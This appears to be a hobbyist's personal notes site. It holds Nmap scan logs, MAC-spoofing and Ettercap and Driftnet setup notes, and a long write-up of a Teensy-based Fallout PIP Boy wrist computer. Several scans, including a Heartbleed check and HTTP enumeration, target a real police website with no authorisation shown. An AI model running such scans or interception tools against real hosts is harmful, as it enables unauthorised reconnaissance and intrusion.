22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 2d:3c:fe:7a:85:c5:e0:28:ee:6e:80:eb:4b:2f:c6:b7 (DSA)
|   2048 2b:b2:c1:eb:57:ba:4e:f8:17:c2:91:d4:c8:42:09:66 (RSA)
|_  256 73:5f:36:69:02:e7:7e:7d:84:3f:a4:e1:e7:fd:67:2c (ECDSA)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          44560/tcp  status
|_  100024  1          56360/udp  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.44 seconds

Nmap NSE script information

ztik@unknownhost:~$ nmap --script-help=vnc-brute
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:49 CET
 
vnc-brute
Categories: intrusive brute
https://nmap.org/nsedoc/scripts/vnc-brute.html
  Performs brute force password auditing against VNC servers.

Nmap NSE script scan

ztik@unknownhost:~$ nmap -sV -p 443 -script=ssl-heartbleed.nse www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:53 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.0085s latency).
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Edgecast ECD httpd
|_http-server-header: ECD (rtm/3514)
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.95 seconds

Nmap NSE script scan

ztik@unknownhost:~$ nmap -sV --script=smb* 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:55 CET
Nmap scan report for 10.0.2.15
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          44560/tcp  status
|_  100024  1          56360/udp  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.97 seconds

Nmap UDP DDOS Reflector scan

ztik@unknownhost:~$ nmap -sU -A -PN -n -pU:19,53,123,161 -script=ntp-monlist,dns-recursion,snmp-sysdescr 10.0.2.0/24
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:58 CET
Nmap scan report for 10.0.2.2
Host is up (0.00025s latency).
PORT    STATE         SERVICE VERSION
19/udp  closed        chargen
53/udp  closed        domain
123/udp open|filtered ntp
161/udp closed        snmp
MAC Address: 52:54:00:12:35:02 (QEMU virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: HP FlexFabric 5900CP switch (Comware 7.1) (99%), Huawei S9300 switch (99%), Ricoh Aficio 3045/3245C or Savin 8025e printer (99%), Cisco 2950 switch (IOS 12.1) (97%), Cisco 2900-series switch (IOS 12.0) (97%), NetBSD 1.4.2 - 1.5.2; Lanier LS232c, NRG DSc428, Ricoh Aficio 2020, Ricoh NRG MP 161, or Savin 8055 printer; or Panasonic Network Camera (BB-HCM331, BB-HCM381, BCL-30A, BL-C1CE, or BL-C10CE) (97%), Lexmark C500 or C720 printer (97%), Nashuatec Aficio MP C3000 printer (97%), IRIX64 IRIS 6.5 (97%), SGI IRIX 6.5 (97%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 10.0.2.2
 
Nmap scan report for 10.0.2.3
Host is up (0.00016s latency).
PORT    STATE         SERVICE VERSION
19/udp  filtered      chargen
53/udp  filtered      domain
123/udp open|filtered ntp
161/udp filtered      snmp
MAC Address: 52:54:00:12:35:03 (QEMU virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: switch|general purpose|media device
Running: Cisco CatOS 7.X|8.X, HP Tru64 UNIX 5.X, Vantage embedded
OS CPE: cpe:/h:cisco:catalyst_ws-c6506 cpe:/o:cisco:catos:7.6 cpe:/o:cisco:catos:8.3 cpe:/o:hp:tru64:5.1a cpe:/h:vantage:hd7100s
OS details: Cisco Catalyst WS-C6506 switch (CatOS 7.6(16)), Cisco Catalyst switch (CatOS 8.3(2)), HP Tru64 UNIX 5.1A, Vantage HD7100S satellite receiver
Network Distance: 1 hop
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.16 ms 10.0.2.3
 
Nmap scan report for 10.0.2.4
Host is up (0.00042s latency).
PORT    STATE         SERVICE VERSION
19/udp  filtered      chargen
53/udp  filtered      domain
123/udp open|filtered ntp
161/udp filtered      snmp
MAC Address: 52:54:00:12:35:04 (QEMU virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: switch|general purpose|media device
Running: Cisco CatOS 7.X|8.X, HP Tru64 UNIX 5.X, Vantage embedded
OS CPE: cpe:/h:cisco:catalyst_ws-c6506 cpe:/o:cisco:catos:7.6 cpe:/o:cisco:catos:8.3 cpe:/o:hp:tru64:5.1a cpe:/h:vantage:hd7100s
OS details: Cisco Catalyst WS-C6506 switch (CatOS 7.6(16)), Cisco Catalyst switch (CatOS 8.3(2)), HP Tru64 UNIX 5.1A, Vantage HD7100S satellite receiver
Network Distance: 1 hop
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 10.0.2.4
 
Nmap scan report for 10.0.2.15
Host is up (0.00011s latency).
PORT    STATE  SERVICE VERSION
19/udp  closed chargen
53/udp  closed domain
123/udp closed ntp
161/udp closed snmp
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 115.08 seconds

Nmap HTTP page title scan

ztik@unknownhost:~$ nmap --script=http-title 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:34 CET
Nmap scan report for 10.0.2.15
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds
ztik@unknownhost:~$ nmap --script=http-title www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:34 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.025s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
|_http-title: Did not follow redirect to https://www.politie.nl/
 
Nmap done: 1 IP address (1 host up) scanned in 10.10 seconds

Nmap HTTP web service header scan

ztik@unknownhost:~$ nmap --script=http-headers www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:36 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.011s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
| http-headers: 
|   Accept-Ranges: bytes
|   Cache-Control: s-maxage=60, max-age=60
|   Content-Type: application/octet-stream
|   Date: Sun, 19 Feb 2017 17:36:30 GMT
|   Last-Modified: Sun, 19 Feb 2017 17:36:17 GMT
|   Location: https://www.politie.nl/
|   Server: ECD (rtm/3514)
|   Strict-Transport-Security: max-age=15768000
|   X-Cache: 301-HIT
|   X-Frame-Options: DENY
|   Content-Length: 0
|   Connection: close
|   
|_  (Request type: GET)
443/tcp open  https
| http-headers: 
|   Accept-Ranges: bytes
|   Cache-Control: s-maxage=60, max-age=60
|   Content-Type: text/html;charset=UTF-8
|   Date: Sun, 19 Feb 2017 17:36:30 GMT
|   Expires: Sun, 19 Feb 2017 17:46:30 GMT
|   Last-Modified: Sun, 19 Feb 2017 17:35:56 GMT
|   Server: ECD (rtm/3514)
|   Strict-Transport-Security: max-age=15768000
|   X-Cache: HIT
|   X-Frame-Options: DENY
|   X-UA-Compatible: IE=edge
|   Content-Length: 34065
|   Connection: close
|   
|_  (Request type: HEAD)
 
Nmap done: 1 IP address (1 host up) scanned in 7.62 seconds

Nmap HTTP web service enumeration scan

ztik@unknownhost:~$ nmap --script=http-enum www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:36 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.012s latency).
All 1000 scanned ports on www.politie.nl (152.195.52.37) are filtered
 
Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds

Nmap SSL Heartbleed vulnerability scan

ztik@unknownhost:~$ nmap -sV -p 443 --script=ssl-heartbleed www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:41 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.0096s latency).
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Edgecast ECD httpd
|_http-server-header: ECD (rtm/3514)
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.23 seconds

Nmap IP information scan

ztik@unknownhost:~$ nmap --script=asn-query,whois-ip,ip-geolocation-maxmind 8.8.4.4
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:45 CET
NSE: [ip-geolocation-maxmind] You must specify a Maxmind database file with the maxmind_db argument.
NSE: [ip-geolocation-maxmind] Download the database from http://dev.maxmind.com/geoip/legacy/geolite/
Nmap scan report for google-public-dns-b.google.com (8.8.4.4)
Host is up (0.027s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
53/tcp open  domain
 
Host script results:
| asn-query: 
| BGP: 8.8.4.0/24 | Country: US
|   Origin AS: 15169 - GOOGLE - Google Inc., US
|_    Peer AS: 1103 1239 2381 3257 3910 6453
| whois-ip: Record found at whois.arin.net
| netrange: 8.8.4.0 - 8.8.4.255
| netname: LVLT-GOGL-8-8-4
| orgname: Google Inc.
| orgid: GOGL
| country: US stateprov: CA
| orgtechname: Google Inc
|_orgtechemail: arin-contact@google.com
 
Nmap done: 1 IP address (1 host up) scanned in 9.94 seconds

Nmap Domain information scan

ztik@unknownhost:~$ nmap --script=asn-query,whois-domain,ip-geolocation-maxmind www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:45 CET
NSE: [ip-geolocation-maxmind] You must specify a Maxmind database file with the maxmind_db argument.
NSE: [ip-geolocation-maxmind] Download the database from http://dev.maxmind.com/geoip/legacy/geolite/
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.012s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
 
Host script results:
| asn-query: 
| BGP: 152.195.52.0/24 | Country: US
|   Origin AS: 15133 - EDGECAST - MCI Communications Services, Inc. d/b/a Verizon Business, US
|_    Peer AS: 1103 1299 2914 6762 33891
| whois-domain: 
| 
| Domain name record found at whois.domain-registry.nl
| Domain name: politie.nl\x0D
| Status:      active\x0D
| \x0D
| Registrar:\x0D
|    KPN  Corporate Market\x0D
|    Paalbergweg 13\x0D
|    1105AG AMSTERDAM ZUIDOOST\x0D
|    Netherlands\x0D
| \x0D
| DNSSEC:      yes\x0D
| \x0D
| Domain nameservers:\x0D
|    ns2.isc.nl\x0D
|    ns.megaplex.nl\x0D
|    ns1.megaplex.nl\x0D
|    ns1.pinkroccade.net\x0D
| \x0D
| Record maintained by: NL Domain Registry\x0D
| \x0D
| Copyright notice\x0D
| No part of this publication may be reproduced, published, stored in a\x0D
| retrieval system, or transmitted, in any form or by any means,\x0D
| electronic, mechanical, recording, or otherwise, without prior\x0D
| permission of the Foundation for Internet Domain Registration in the\x0D
| Netherlands (SIDN).\x0D
| These restrictions apply equally to registrars, except in that\x0D
| reproductions and publications are permitted insofar as they are\x0D
| reasonable, necessary and solely in the context of the registration\x0D
| activities referred to in the General Terms and Conditions for .nl\x0D
| Registrars.\x0D
| Any use of this material for advertising, targeting commercial offers or\x0D
| similar activities is explicitly forbidden and liable to result in legal\x0D
| action. Anyone who is aware or suspects that such activities are taking\x0D
| place is asked to inform the Foundation for Internet Domain Registration\x0D
| in the Netherlands.\x0D
| (c) The Foundation for Internet Domain Registration in the Netherlands\x0D
| (SIDN) Dutch Copyright Act, protection of authors' rights (Section 10,\x0D
|_subsection 1, clause 1).\x0D
 
Nmap done: 1 IP address (1 host up) scanned in 8.13 seconds

  • Shit about how iptables work
  • Shit about configuring iptables
  • Shit about restoring config at reboot

Installing MAC CHANGER on Debian Jessie

ztik@unknownhost:~$ apt-get install macchanger
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  macchanger
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 192 kB of archives.
After this operation, 622 kB of additional disk space will be used.
Get:1 http://ftp.nl.debian.org/debian/ jessie/main macchanger amd64 1.7.0-5.3 [192 kB]
Fetched 192 kB in 0s (1,257 kB/s)
Preconfiguring packages ...
Selecting previously unselected package macchanger.
(Reading database ... 155263 files and directories currently installed.)
Preparing to unpack .../macchanger_1.7.0-5.3_amd64.deb ...
Unpacking macchanger (1.7.0-5.3) ...
Processing triggers for man-db (2.7.0.2-5) ...
Processing triggers for install-info (5.2.0.dfsg.1-6) ...
Setting up macchanger (1.7.0-5.3) ...
ztik@unknownhost:~$ 

Set randomized MAC address

ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 08:00:27:b8:9b:bf  
ztik@unknownhost:~$ macchanger -r eth0
Current MAC:   08:00:27:b8:9b:bf (CADMUS COMPUTER SYSTEMS)
Permanent MAC: 08:00:27:b8:9b:bf (CADMUS COMPUTER SYSTEMS)
New MAC:       42:18:a8:ca:e4:b5 (unknown)
ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 42:18:a8:ca:e4:b5 
ztik@unknownhost:~$ 

Set fixed MAC address

ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 42:18:a8:ca:e4:b5  
ztik@unknownhost:~$ macchanger -m 00:11:22:22:11:00 eth0
Current MAC:   42:18:a8:ca:e4:b5 (unknown)
Permanent MAC: 08:00:27:b8:9b:bf (CADMUS COMPUTER SYSTEMS)
New MAC:       00:11:22:22:11:00 (CIMSYS Inc)
ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 00:11:22:22:11:00  
ztik@unknownhost:~$ 

Restore original MAC address

ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 00:11:22:22:11:00  
ztik@unknownhost:~$ macchanger -p eth0
Current MAC:   00:11:22:22:11:00 (CIMSYS Inc)
Permanent MAC: 08:00:27:b8:9b:bf (CADMUS COMPUTER SYSTEMS)
New MAC:       08:00:27:b8:9b:bf (CADMUS COMPUTER SYSTEMS)
ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 08:00:27:b8:9b:bf  
ztik@unknownhost:~$ 

Installing Ettercap on Debian Jessie

ztik@unknownhost:~$ apt-get install ettercap-graphical
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following extra packages will be installed:
  ethtool ettercap-common libluajit-5.1-2 libluajit-5.1-common libnet1
The following NEW packages will be installed:
  ethtool ettercap-common ettercap-graphical libluajit-5.1-2 libluajit-5.1-common libnet1
0 upgraded, 6 newly installed, 0 to remove and 0 not upgraded.
Need to get 1,139 kB of archives.
After this operation, 3,419 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://ftp.nl.debian.org/debian/ jessie/main libluajit-5.1-common all 2.0.3+dfsg-3 [36.6 kB]
Get:2 http://ftp.nl.debian.org/debian/ jessie/main libluajit-5.1-2 amd64 2.0.3+dfsg-3 [204 kB]
Get:3 http://ftp.nl.debian.org/debian/ jessie/main libnet1 amd64 1.1.6+dfsg-3 [60.4 kB]
Get:4 http://ftp.nl.debian.org/debian/ jessie/main ethtool amd64 1:3.16-1 [94.9 kB]
Get:5 http://ftp.nl.debian.org/debian/ jessie/main ettercap-common amd64 1:0.8.1-3 [567 kB]
Get:6 http://ftp.nl.debian.org/debian/ jessie/main ettercap-graphical amd64 1:0.8.1-3 [176 kB]
Fetched 1,139 kB in 0s (2,774 kB/s)         
Selecting previously unselected package libluajit-5.1-common.
(Reading database ... 155063 files and directories currently installed.)
Preparing to unpack .../libluajit-5.1-common_2.0.3+dfsg-3_all.deb ...
Unpacking libluajit-5.1-common (2.0.3+dfsg-3) ...
Selecting previously unselected package libluajit-5.1-2:amd64.
Preparing to unpack .../libluajit-5.1-2_2.0.3+dfsg-3_amd64.deb ...
Unpacking libluajit-5.1-2:amd64 (2.0.3+dfsg-3) ...
Selecting previously unselected package libnet1:amd64.
Preparing to unpack .../libnet1_1.1.6+dfsg-3_amd64.deb ...
Unpacking libnet1:amd64 (1.1.6+dfsg-3) ...
Selecting previously unselected package ethtool.
Preparing to unpack .../ethtool_1%3a3.16-1_amd64.deb ...
Unpacking ethtool (1:3.16-1) ...
Selecting previously unselected package ettercap-common.
Preparing to unpack .../ettercap-common_1%3a0.8.1-3_amd64.deb ...
Unpacking ettercap-common (1:0.8.1-3) ...
Selecting previously unselected package ettercap-graphical.
Preparing to unpack .../ettercap-graphical_1%3a0.8.1-3_amd64.deb ...
Unpacking ettercap-graphical (1:0.8.1-3) ...
Processing triggers for man-db (2.7.0.2-5) ...
Processing triggers for desktop-file-utils (0.22-1) ...
Processing triggers for gnome-menus (3.13.3-6) ...
Processing triggers for mime-support (3.58) ...
Setting up libluajit-5.1-common (2.0.3+dfsg-3) ...
Setting up libluajit-5.1-2:amd64 (2.0.3+dfsg-3) ...
Setting up libnet1:amd64 (1.1.6+dfsg-3) ...
Setting up ethtool (1:3.16-1) ...
Setting up ettercap-common (1:0.8.1-3) ...
Setting up ettercap-graphical (1:0.8.1-3) ...
Processing triggers for libc-bin (2.19-18+deb8u7) ...
ztik@unknownhost:~$

Installing Driftnet on Debian Jessie

ztik@unknownhost:~$ apt-get install driftnet
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  driftnet
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 31.7 kB of archives.
After this operation, 113 kB of additional disk space will be used.
Get:1 http://ftp.nl.debian.org/debian/ jessie/main driftnet amd64 1.1.5-1+b2 [31.7 kB]
Fetched 31.7 kB in 0s (419 kB/s)
Selecting previously unselected package driftnet.
(Reading database ... 155252 files and directories currently installed.)
Preparing to unpack .../driftnet_1.1.5-1+b2_amd64.deb ...
Unpacking driftnet (1.1.5-1+b2) ...
Processing triggers for man-db (2.7.0.2-5) ...
Processing triggers for desktop-file-utils (0.22-1) ...
Processing triggers for gnome-menus (3.13.3-6) ...
Processing triggers for mime-support (3.58) ...
Setting up driftnet (1.1.5-1+b2) ...
ztik@unknownhost:~$ 

  • Shit about running a TOR relay node
  • Shit about running a TOR exit node
  • Shit about how to run a server behind the TOR network
  • Shit about keeping your TOR connection secure

more shit I still need to finish :(


  • Shit about setting up SSH server and client
  • Shit about securing SSH connections
  • Shit about Key Based Authentication

For some time I have been working on a new project, something completely new to me.
I bought myself a Teensy 3.0, which is an extremely tiny microcontroller, with a lot of bang :)

This microcontroller has some amazing abilities, like being detected as a HID (keyboard/mouse/joystick), which means it can type, move mousecursor or joystick axis (and mouse/joystick buttons ofcourse).
Since every operating system contains default drivers for HID interfaces, there is no need to install any extra software to make it work.
Just connect it to the computers USB port, and the operating system will load its default drivers.
This is amazing and loads of fun, but within a matter of weeks I wanted to take the next step, actually using the Teensy as a microcontroller and connect some stuff to it.

I turned on the A-Team theme song, and started to connect an RGB LED.
When the song was finished, I wasn't done yet, so I followed up with the Macgyver theme song.

I wasn't really expecting success, I was expecting smoke but by the time this second song was done, I ended up with a blinking RGB LED, each blink displaying a new colour!
The same can be said about the temperature sensor I connected afterwards, it worked on the first try :)
At the time I was playing a computer game 'Fallout', in which the main character wears a wrist computer called a 'PIP Boy 3000'.

This device can perform all kinds of cool stuff:

  • It displays all the items the character in the game is carrying with him/her.
  • It displays all sorts of information from a local map and world map to a geigercounter.
  • It enables the wearer to use modules like FM Radio and measure physical statistics such as vital signs, amount of radiation absorbed and other inflictions one might have like addictions.

How cool would that be? My own PIP Boy 3000 :)

Since this would not just be a cool gadget, but also a way to learn more about how to work with electronics, I decided to throw some money at it and buy a 2.8“ TFT touchscreen along with every kind of module & sensor that can mimic the functions of the ingame device (on the bottom of this post is a link with all the parts).

Although it took me a little over 3 weeks to get the screen to work, once it actually worked my project has picked up a lot of momentum :)
Since then I have been able to connect a lot of addons such as the MicroSD adapter, a GPS module, Pulse sensor, Compass, Altimeter, Speaker, Microphone, FM Radio module, buttons, lights and even an I/O expander.
Since I do not have a lot of knowledge on basic electronics, so somewhere along the way I became a member of hackerspace 'Technologia Incognita', located in Amsterdam.

As time passes, more functions will be added, and more information will be released.
Updates will follow on this website :)


What is it?

A wristcomputer similar to the PIP Boy 3000 from the game series Fallout.

The device is made up of several modules and sensors such as:

  • 2.8” TFT touchscreen
  • MicroSD card (contains images and logfiles)
  • GPS
  • Compass
  • FM Radio
  • 6 Degrees Of Freedom motionsensor
  • Altitude/pressure sensor
  • Light sensors
  • Audio sensors
  • 3x Ultrabright white LED's
  • 1x non-diffused RGB LED
  • Laserpointer

The PIP Boy 3000 from the game series Fallout also contains a geigercounter, <s>but I do not think this is a realistic addition :(</s> and it turns out this is actually doable :)
More updates on this will follow soon.

The 'PIP' in the name 'PIP Boy 3000' is an acronym for 'Personal Information Processor'.
I am not sure yet what 'PIP GRL 31415' will stand for, probable be something like:

  • 'Personal Information Processor - Graphical Readouts/Locator'

Things to know

  • To use the touch sensitive screen a stylus is… useful unless you have small fingers.
  • The option pages (Page_100-103) can be opened by touching/pressing the topright corner of the screen, there is a 5×5 px square (invisible) that activates it.
  • Before power up, check if the laserpointer is still properly connected. Its wires unplug rather easily.
  • To power it up, you do NOT need to plug in a USB cable into the Teensy 3.0 microcontroller.
  • I have cut the VIN trace, which means the Teensy is not drawing power from its USB cable, but from an external source.
  • The external source is the Breadboard USB powersupply, which delivers 5v to the Teensy's 'Vin (3.7 to 5.5 volts)' pin.
  • There is also a switch on the Breadboard USB powersupply which has to be flipped to turn on/off :)
  • To modify code on the microcontroller, you only need to connect the Teensy Micro-USB connection to a computer.
  • To use the PIP GRL 31415, you only need to connect the Breadboard USB powersupply, and flip the switch.

What happens when you turn it on

When the device is powered up, the first thing it will ask is to select the proper password (Page_0).
You have 4 tries, after which the device will enter 'bricked mode'.
At the moment of writing, this is bypassable by restarting the device (ie. bricked mode is NOT permanent during prototype phase).

Once logged in, the user has a choice of several 'pages':

  • Page_1, Page_2 & Page_3 are 'normal' pages which contain functions the enduser is able to use.
  • Page_100, Page_101, Page_102 & Page_103 are 'option' pages, much like the settings screen of any computergame.
  • Page_99 is the 'bricked' page

Overview of page functionality

Page_0 a.k.a. LOGIN

The LOGIN page displays a list of characters and words, the password needs to be selected to continue.
This page is a direct copy of the RobCo computer terminals primarily present in the game series Fallout image.
There has been a small change made, this device will not display the amount of correct characters in the chosen password as the game does.

After 4 consecutive incorrect attempts, Page_99 is displayed (bricked mode)


Page_1 a.k.a. STATS

The STATS page is divided into 5 menu's, each menu can have several submenus

Status menu

Status menu which has 3 submenus:

CND:
Displays endusers health

RAD:
Displays amount of radiation absorbed, at the moment this is actually the average of 3 random numbers.
The random numbers are readings from an analog pin without anything connected to it (noise).

EFF:
Displays the armor the enduser is wearing, also not functioning… (RFID tags in clothes?)

S.P.E.C.I.A.L. menu

The S.P.E.C.I.A.L. has 7 submenus:

Strength:
Displays description with value 5

Perception:
Displays description with value 9

Endurance:
Displays description with value 9

Charisma:
Displays description with value 7

Intelligence:
Displays description with value 9

Agility:
Displays description with value 8

Luck:
Displays description with value 9

Skills menu

Doesn't display anything yet, currently working on this section.
Will soon display 3 submenus, keyboard/mouse/joystick/gamepad (keyboard and mouse are working now).
From these you will have the option to control ANY computer just by connecting a USB cable between the computer itself and the Teensy microcontroller.

Thought for later: add a wireless connection, although this will probably require drivers to be installed (destroys plug&play functionality), and will probably consume much more power.1)

The mouse functions are implemented (with the exception of mouse-scroll up/down), and they work like a charm.

Keyboard submenu:
Well… I could explain every key here, but that would be a waste of space.
I will be have been working on a US International keyboard without numpad (not enough space on screen), so it will probably become more works like a laptop version.

Some things to take into consideration:

  • Press CAPS or SHIFT for uppercase and/or other characters.
  • CTRL, ALT, SHIFT and the right WIN button are modifier keys, meaning when you press one, it will highlight, until you press another (non-modifier) key.
  • The left WIN button is a non-modifier key and functions as a normal single-press Super/Win key.
  • It is not possible to use multiple modifier keys at the same time.

I still need to update the code to allow such outlandish behaviour.
Having CTRL and SHIFT selected and pressing on the letter S will result in the key combination SHIFT-S being sent first, followed by a CTRL-S.

More information can be found here.

Mouse submenu:
Control mouse with directional keypad (8 directions)
Buttons to simulate LMB, MMB, RMB press.
Buttons to simulate holding down LMB, MMB, RMB to support Drag&Drop functions (press once to hold down, press another time to release).
Buttons to simulate Scroll Up and Scroll Down.

More information can be found [http://pjrc.com/teensy/td_mouse.html here].

Joystick submenu:
A bit of a weird one, Joysticks work on 6 axis, 32(!) buttons and 1 hat switch.
I never worked with Joystick controls before, but I suspect I'll get it right first try (how hard can it be, right?).
Joysticks work on 6 axis, 32(!) buttons and 1 hat switch, and all of these will be implemented.

Working so far:

  • X, Y & Z axis
  • Left & right sliders

Still need to figure out the difference between the Z axis and Z-rotate (different axis?)…

More information can be found [http://pjrc.com/teensy/td_joystick.html here].

Gamepad submenu:
Very similar to Joystick, only different button layout

More information can be found [http://pjrc.com/teensy/td_joystick.html here].

Perks menu

Doesn't display anything yet

Also, not really sure what to put here, will most likely become computer control scripts such as:

  • Windows Powershell & Linux shell scripts
  • wget wallpaper and set to screen script
  • anything else?
General menu

Doesn't display anything yet

Will possibly contain statistics such as time used, SD space used/available and distance traveled (will be inaccurate, GPS doesn't always have a fix) and other fun statistics.


Page_2 a.k.a. ITEMS

The ITEMS page still needs to be filled, the layout exists but nothing has been added (yet).


Page_3 a.k.a. DATA

The DATA page is where most of the magic happens, it has 5 menus:

Local Map

The Local Map displays a map of the Netherlands, and once the GPS has a fix, a rectangle will appear as a 'You are here' indicator.
The plan is to divide this into 3 submenus, each showing a different zoom level of the map (1=country, 2=province, 3=city)

World Map

Same as the Local Map, except this displays a map of the world.
The plan is to divide this into 3 submenus, each showing a different zoom level of the map (1=world, 2=continent, 3=country)

Quests

The Quest menu should display your active/finished quests, but because I do not know how to implement this yet, I decided to add the Audio sensors output here.
The code written for reading the microphones peak-to-peak is horrible, and doesnt function properly yet (should make use of interrupts, not a timed interval).

Misc

The Misc menu displays the values from the Light Dependent Resistor.
The goal is to use this value to decrease the backlight on the TFT using a digital potentiometer automatically.

Radio

The Radio menu contains all controls for the FM Radio.
Turn on/off, Mute on/off, Seek up/down, Tune up/down, Volume up/down.
It also displays the freq. you are listening to, and if this is a mono or stereo signal.

At the moment RDS is not being processed, but will be in the near future.


Page_99 a.k.a. BRICKED

This page will be displayed if you choose the wrong password 4 consecutive times.
Turn the device off and on to retry, bricked mode is not permanent while prototyping :)


Page_100 a.k.a DISPLAY

The DISPLAY options contain:

  • Backlight brightness level (not functioning until I have the dig. potentiometer).
  • Image quality low/medium/high (this defines the prefix folder where images are stored).
  • HUD color (to change foreground colors)
  • Background color (to change… you guessed it…)
  • Return button to return to last used page/menu/submenu

Page_101 a.k.a AUDIO

The AUDIO options are:

  • Mute on/off (to mute the speaker, NOT the radio!)
  • Return button to return to last used page/menu/submenu

Page_102 a.k.a CONTROL

The CONTROL options contain:

  • LED1 on/off (turns on/off ultrabright LED1)
  • LED2 on/off (turns on/off ultrabright LED2)
  • LED3 on/off (turns on/off ultrabright LED3)
  • LED4 on/off (turns on/off RGB LED4 RED)
  • LED5 on/off (turns on/off RGB LED4 BLUE)
  • LED6 on/off (turns on/off RGB LED4 GREEN)
  • LASER on/off (turns on/off LASER pointer)
  • ALL on/off (turns on/off everything)
  • Return button to return to last used page/menu/submenu

Page_103 a.k.a GAMEPLAY

The GAMEPLAY options contain:

  • PAGE1 (shortcut to goto page1)
  • PAGE2 (shortcut to goto page2)
  • PAGE3 (shortcut to goto page3)
  • Return button to return to last used page/menu/submenu

Videos

Some youtube videos I made (poor quality due to bad webcam, I'll shoot a new proper vid soon):

First project video

PIP-GRL 31415

This is the start of my project, something that has already been done, but I want it myself :)

A few attempts have been made at recreating a PIP-BOY from the game Fallout, and as far as I know there has only been 1 that actually worked, but it went up in flames :(
(http://www.raspberrypi.org/archives/tag/pipboy)

At the moment I have:
-Teensy 3.0 microcontroller
Similar to Arduino, but faster, smaller, more memory, 32 bit ARM processor.
http://www.pjrc.com/store/teensy3.html

-MicroSD adapter with an 8GB SDHC Kingston card
http://www.pjrc.com/store/sd_adaptor.html

-2.8" Touchsensitive TFT screen with 18-bit 262,000 different shades, 240x320 pixels resolution and 4 white-LED backlight.
http://www.adafruit.com/products/335

-An old pc-speaker I salvaged out of ancient hardware which plays the Tetris Themesong quite well and now is responsible for simple beeps and bips.

-MiPow 2600 Powertube, basically a 2600mA battery with USB connections
Currently I am still working of off my computers powersupply though.
